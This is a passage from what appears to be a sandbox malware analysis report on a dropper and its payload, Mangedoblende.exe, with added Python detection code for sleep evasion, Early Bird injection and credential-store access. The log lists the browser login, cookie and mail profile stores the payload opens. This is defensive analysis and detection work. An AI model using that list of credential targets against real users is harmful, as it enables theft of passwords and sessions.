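    for source, obs in events:
        m = DELAY_RE.search(obs)
        if m and int(m.group(1)) != INFINITE_DELAY_MS:
            delays[source].append(int(m.group(1)))
    profile = {}
    for source, values in delays.items():
        decreasing = len(values) >= 3 and all(a > b for a, b in zip(values, values[1:]))
        profile[source] = {
            "count": len(values),
            "max_ms": max(values),
            "resleep_loop": decreasing,
            "long_sleep": max(values) >= LONG_SLEEP_MS,
        }
    return profile


def detect_early_bird(events):
    """Return (injector, target) pairs for which all three Early Bird steps were seen."""
    steps_seen = defaultdict(set)
    for source, obs in events:
        for step in EARLY_BIRD_STEPS:
            if obs.startswith(step):
                target = PATH_RE.search(obs)  # first drive-letter path in the observation
                if target:
                    steps_seen[(source, target.group(0))].add(step)
    return sorted(pair for pair, steps in steps_seen.items()
                  if steps.issuperset(EARLY_BIRD_STEPS))


def summarize(lines):
    events = parse(lines)
    return {"sleeps": sleep_profile(events), "early_bird": detect_early_bird(events)}


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LINES).items():
        print(key, value)
```

Run against the sample, `sleep_profile` reports Mangedoblende.exe with four timed sleeps, a maximum of 600000 and both the long-sleep and re-sleep flags set, while powershell.exe does not appear because its only delay is the indefinite sentinel; `detect_early_bird` returns the single pair powershell.exe to Mangedoblende.exe. The injection check deliberately requires all three steps from the same source to the same target, since a process create or a memory write on its own is routine for installers and debuggers.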
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Mangedoblende.exe PID: 1292, type: MEMORYSTR
Source: Yara match | File source: 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Mangedoblende.exe PID: 1292, type: MEMORYSTR
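The file and registry accesses listed above are the whole credential-theft footprint of the dropped payload: Chromium profile stores (Login Data, Cookies, Web Data, History, Top Sites) for Chrome and Edge, the Postbox profile directory, and the Outlook MAPI profile key. A detection does not need the Yara rule; it only needs to see a process that is not the browser or mail client opening those paths. The following is an added example, not code from the report or from Joe Sandbox: it runs that allow-list check over constructed, product-neutral access events that mirror the lines above. The event layout (kind, process, target), the store-family labels and the list of expected owner processes are this example's own assumptions.

```python
"""Flag processes that read browser and mail credential stores they have no business touching.

Added example, not part of the Joe Sandbox report. The targets below are the
files and registry key the report shows Mangedoblende.exe opening; the event
layout (kind / process / target) is a constructed, product-neutral stand-in for
Sysmon-style file- and registry-access telemetry, and the allow-list of expected
owner processes is this example's assumption.
"""
import ntpath
import re
from dataclasses import dataclass

# Chromium-profile artefacts and the Postbox profile directory, matched against a
# lower-cased NT path. Patterns deliberately ignore the browser vendor so Chrome,
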